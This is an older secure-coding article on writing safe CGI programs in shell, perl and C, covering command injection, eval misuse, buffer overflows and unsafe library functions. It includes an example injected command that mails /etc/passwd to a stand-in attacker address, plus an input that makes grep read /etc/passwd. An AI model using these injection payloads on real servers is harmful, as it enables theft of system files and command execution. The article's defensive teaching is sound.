originally Feb 2002
revised through 2008

Writing Safe CGI Programs

CGI software has the potential to create some enormous security holes on your system. If they are carelessly programmed, they allow evildoers out there on the Internet to enter Unix commands into a form and have them executed on your web server. This article covers the basics of making your CGI software secure. It is written for Unix-based environments. The languages discussed are shell, perl, and C, but the principles should apply to any language.

[Because we need to use all of the different quote characters within many of the examples, literal strings are not surrounded by quotes; instead user-input strings are shown in a , and program strings are shown with a dark background and green text.]

Contents:    Shell Game    Other Problems    Summary    Appendix A: Dangerous Characters    Appendix B: Unsafe Operations    Appendix C: Unsafe Library Functions   

Shell Game

We'll start with a few examples of how you can get into trouble. This bit of perl code is intended to search for files in a specific directory and find any that match a user-provided search specification:
  open("/bin/ls /data/cardfiles | grep $searchspec |");
The variable $searchspec contains information that was extracted directly from the HTML form. Let's suppose the user enters . Perl starts the command /bin/ls /data/cardfiles | grep zippy, by calling the C function popen(), which in turn passes this string to /bin/sh to actually start up the command. The reason the shell is used, is that it allows much greater freedom to the programmer in what commands can be run and how they are started. For example, you can use a pipe and run two commands, as shown in the example above. Without this feature, you'd have to start the commands separately and read from one and write to the other. This access to the full syntax of the shell is handy for many other reasons also, but this is also where the trouble begins.

Suppose the user enters one of the following onto the form for the above searchspec field:

The final result of the first example will be that the shell is handed this command:
  /bin/ls /data/cardfiles | grep blah `/bin/mailx -s anothervictim evilperson@evildomain.org < /etc/passwd`
The backticks, and the file redirection work just like they would in any shell command, and so the contents of the password file are mailed to evilperson. The next two examples work similarly, using different special characters (the semicolon and newline respectively), and demonstrate other nasty things that someone might possibly do.

Most examples of security problems in CGIs can be traced to the fact that a shell is unexpectedly started and handed some data from the HTML form. And in almost every case, the shell is started simply as a convenient way to start some other outside program. (Our examples focus on just one way this can happen, a list of possible trouble spots are found in Appendix B.) This brings us to one of the most important recommendations here:

Avoid starting external programs where possible. It is always best if you can build all of the needed functionality into your CGI. Even if you start the external program in a secure way, it's possible that the external program could manage to do something insecure that you didn't expect.

But sometimes you have to start external programs. Can it be done securely? The best way to do this is to make sure the user data is clean of any trouble. In fact, the best way to make any CGI secure is to completely isolate the input data from any possible abuse. Suppose a field on the form has just three possible values, Yes, No, and Maybe. You could simply compare the input value to each of these three values, and if doesn't match, you immediately generate an error and give up. If there is an exact match, then you know the value is completely safe to use.

As an aside, you can't rely on the HTML form to provide this constraint. If you have a pulldown menu that contains a list of values, it is still possible for a malicious user to submit other values you don't list. They can simply copy your HTML form, and edit the values; this will work for both the GET and POST methods. Also note that a malicious user can simply encode things directly in the URL for use with the GET method, and because of how most CGI libraries work, it will probably work even if the author was originally using POST.

Unfortunately it is not always possible to constrain your input so tightly. For instance in a search form, you usually can't predict every reasonable search term in advance. If you can't constrain the input, and you have to start an outside program, your best bet is to avoid using the shell to start the outside program. If you are just starting the outside program, and the current one is finished, you can just use exec(), which replaces the current program with the new one. This command exists (in one form or another) in shell, perl, and C (note that care must be used in perl; see Appendix B). In all three languages, you'll be protected from immediate harm (but you still have to worry about what the new program does with the data). But if you are opening a pipe to a command (as in the first example), then coding this is a bit trickier. You need to understand pipe(), fork(), and exec(), and a complete description is beyond the scope of this article. Perl will do a fork() and exec() for you with the system() function (note that this doesn't set up piped I/O), however care must be taken to use the correct form, otherwise a shell may still be used. For more on this, see the line item for the system() function in Appendix B, in the perl section.

If you aren't a system programmer, or if you have particularly complex file redirection needs, then it may be difficult to avoid the temptation to let the shell start your external program. Even if you do use exec, if you don't control the sources to the outside program, you still aren't protected. So what else can we do to stay safe?

An adequate (but not great) solution is to attempt to strip out all of the dangerous characters. The problem with this is that the list is long, and you might miss something. Worse, which characters are dangerous depends on exactly what you are doing, and which language(s) you are working with. Consider this example:

  open("grep $name /data/phonebook |");
In this example, even a space becomes a dangerous character. If the evildoer enters , the command that is run will be grep root /etc/passwd /data/phonebook, and (depending on how the output is handled) the CGI output may well include the root password entry from the password file.

If you can identify every dangerous character and strip them out, that's great. In some cases, you can even simply limit the input to alphanumerics, which will provide good protection. But suppose the input is supposed to include some of these dangerous characters? If you can't filter them out, the next best thing is to quote the characters so that they won't be dangerous anymore:

  open("grep '$name' /data/phonebook |");
Now, we're protected against the dangerous spaces, as well as every other dangerous character. Except for the single-quote! Here if the user enters , we're back to where we started. We can replace single quotes with the string '"'"' (the first single quote ends the current quoted text, then there are a pair of double quotes used to quote a single quote, then the final single quote restarts normal single-quoting). This will make the string completely safe. At least safe from the shells. This also assumes that the program we call doesn't pass them to a shell again, because after the command has them, the shell has already stripped out our quoting and we're back to a raw string again. If you know the string will go through two or more shell evaluations, quoting becomes almost hopelessly complex.

A simpler way to handle quoting is to use a backslash in front of each problem character, because it's a more consistent approach (there's no bizarre exception like quoting the single quote above). You just have to remember to backslash everything that might be a problem (See Appendix A). In many cases, you can even put a backslash in front of every character (including normal characters) and get the protection you want without causing any problems. Again though, if the string goes through additional evaluations, you have to add quoting for each evaluation, and this becomes very complex (2n-1 backslashes are needed)

Note that with perl, if there are no shell special characters in an open command, then it won't use the shell to interpret the command. Unfortunately backslashses are not counted as special characters, so if you protect through backslashing, the backslashes may not be stripped depending on how perl choses to execute it. And, you can't rely on perl not using the shell, because if user input contains special characters, then it may behave differently than it does in your tests.

Other Problems

That about covers all the different approaches to making yourself safe from shells. But this is only one way in which you can get into trouble.

Any interpreted language can expose the input string to unexpected evaluations. Normally, in interpreted languages, simply having the information stored in a variable offers some protection from problems. For instance, in perl, $total = $input*1.15 + 37.50; can not be subverted by putting dangerous characters into the $input variable, because when perl replaces the variable with its value, it has already finished with checking for backticks and things like that. This is also true if /bin/sh is your scripting language. However, both of these languages have an eval statement, which causes a second pass of evaluation to occur. Here's an example of how this can be handy. Part of the user input involves selecting a sorting function, which is stored in the variable $howsort:

  @newlist = eval sort $howsort @oldlist;
Without the eval, you'd have to do an if/else to check each possible value of $howsort, so it is handy. And it doesn't invoke the shell as it stands. However, it re-invokes perl, so if $howsort includes a string with backticks, you can make it run the shell. Even ignoring backticks, we could actually insert any perl code we want here, and it would be run. This could include a large block of code. The best solution is to test each possible value within an if/else or case statement, and again you could try filtering or quoting, but also, you should avoid using eval statements if at all possible. And it usually is possible, it just makes the code longer and more complicated.

Compiled languages that use the C library functions suffer from a problem of their own. Because many of the library functions don't do bounds checking on input strings, it is possible to overflow a buffer while reading input, and overwrite the stack, and cause the program to execute machine code that was supplied by the user. So a user can send arbitrarily long query strings to your program, hoping to overflow the buffer and run something of their own. Contrary to popular belief, access to source code is not required, the evildoer just has to keep trying different length inputs.

This problem can be avoided by taking care to not let buffers overflow. If you are using read() in loop, just add an exit condition for hitting the end of the buffer. For the library functions, there are safe forms of most functions. Even if there aren't, you only have to check that a string is short enough before using it in an unsafe function. Appendix C lists some unsafe functions, and their safe equivalents.

Even if you avoid all of the above general case pitfalls, there's still room for evil to occur. There are a great number of application-specific holes that you could leave if you aren't careful. Here's some examples:

Summary

Here are all of the above recommendations, in the order that I would prioritize them.
  1. When you can, check that the provided values exactly match expected values.
  2. Avoid eval at all costs.
  3. Avoid calling outside programs.
  4. If you call outside programs, avoid using the shell to start them. See Appendix B for a list, but realize that this is not a complete list.
  5. If you have to use eval, or a shell, and if you can't completely check the input, then consider stripping out dangerous characters, or quoting them, where appropriate.
  6. Even if you aren't using eval, and you are avoiding shell interpretation, think carefully about other ways in which the user data is being used, and how that might be exploited.

Appendix A: Possibly Dangerous Characters

This following characters may cause problems when /bin/sh or /bin/csh (or variants of those programs) are used to start outside programs, or within eval statements if these shells are used to implement CGI programs. You should not assume this list is complete.

Character NameCharacterProblems
backslash \quoting
double quote "quoting
single quote 'quoting
dollar sign $variable substitution
ampersand &command separator
greater than >I/O redirection
less than <I/O redirection
asterisk *file globbing
question mark ?file globbing
left bracket [file globbing
right bracket ]file globbing
left paren (word separator
right paren )word separator
pipe |command separator
backtick `subcommand execution
semicolon ;command separator
pound sign #comment character (sh only)
caret ^command separator (sh only)
exclamation point !history execution (csh only)
tilde ~username expansion (csh only)
carriage return ascii 13command separator
line feed ascii 10command separator
space  word separator
tab ascii 9word separator
NULL ascii 0truncates input

Appendix B: Possibly Unsafe Operations

The following problems should NOT be considered an exhaustive list.

C

perl shell PHP - these notes are preliminary; I don't yet know how safe or unsafe PHP is, but these should be used carefully:

Appendix C: Unsafe Library Functions

The following C library functions (on the left) can suffer from buffer overflow problems. The functions to the right are preferred to prevent these problems. These may not always be completely equivalent, please check the man pages for details. If the Safe Replacement isn't available on your system, make sure to check the lengths of strings before using them.

Simply using these functions doesn't make you safe, you have to make sure the size limits you use are set to match the buffer sizes you have (minus one, usually). For example, it is tempting to use read or fread (not listed here because they're generally safe), with the size set to the value from the Content-Length HTTP field, but this can lead to buffer overrun.

Unsafe Function Safe Replacement
gets() fgets()
sprintf() snprintf() [if available]
strcat() strncat() or strlcat()
strcpy() strncpy() or strlcpy()
strcmp() strncmp()
strcasecmp() strncasecmp()
scanf(),fscanf(),sscanf() if %s is used, make sure to specify input length (e.g. %12s)


Tom Fine's Home Send Me Email